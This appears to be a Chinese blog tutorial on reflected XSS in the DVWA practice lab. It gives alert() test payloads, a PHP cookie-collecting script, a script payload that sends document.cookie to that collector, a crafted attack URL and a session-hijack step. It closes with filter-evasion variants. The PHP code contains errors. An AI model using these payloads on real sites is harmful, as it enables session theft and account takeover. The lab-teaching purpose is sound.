zoukankan      html  css  js  c++  java
  • DVWA-xss反射型(跨站脚本漏洞)

    首先进入DVWA页面,选择low等级。

    进入xxs(reflect)页面。

    我们在弹窗中进行测试,输入xxs则结果如下:

    然后再输入<xss>xss脚本试一试。结果如下:

    查看元素发现helllo后面出现一对xss标签,似乎可以html注入。

    接下来我们进行xss弹窗测试,能弹窗则存在xss漏洞。

    我们先输入xss则在URL中显示name=xss

    那我们让name=<script>alert(/xss/)</script>则结果如下:

    注:可以弹窗的函数有alert(),confirm(),prompt()

    xss攻击思路:

    主要有四方:用户,被攻击的web服务器,攻击者,攻击者的web服务器

    首先进行攻击者的web设计

    我们就用下面这个URL http://127.0.0.1/cookie.php

    在wamp的www目录下创建一个cookie.php文件,内容如下:

    <?php

    $cookie=$_GET['$cookie'];//将get请求参数存储到cookie变量中

    $file_put_contents('cookie.txt',$cookie);//把偷取的用户cookie写到cookie.txt文件中。

    ?>

    构造攻击js

    <script>document.location='http://127.0.0.1/cookie.php/?cookie='+document.cookie;</script>

    //document.location将页面的内容指定到指定位置。

    构造并发送攻击URL

    http://localhost:8080/DVWA-master/vulnerabilities/xss_r/?name=<script>document.location='http://127.0.0.1/cookie.php/?cookie='+document.cookie:</script># //要对参数进行URL编码

    获得cookie.txt,我们访问cookie.txt

    PHPSESSID是被攻击者的登录凭证。

    F12调出cookie右键点击编辑把PHPSESSEN换成我们获取的。

    然后访问DVWA的index.php,则就以管理员的身份进入,如下图

     注:防止script标签被过滤掉可以用大小写交替如<ScRiPt></ScRiPt>,还可以用img标签如<img src=x onerror=alert(1)>

  • 相关阅读:
    EOJ 1822 Hanoi Tower IV
    Firefox,chrome,IE上传图片预览
    js保存,获取,删除cookie的操作
    jquery 特效
    SimpleDateFormat转换时间,12,24时间格式[转]
    javascript捕获页面窗口关闭事件
    [转]ajQuery的deferred对象详解
    iframe
    火狐路径问题
    JAVA折腾微信公众平台(Token验证)[转]
  • 原文地址:https://www.cnblogs.com/wang1212-/p/9028349.html
Copyright © 2011-2022 走看看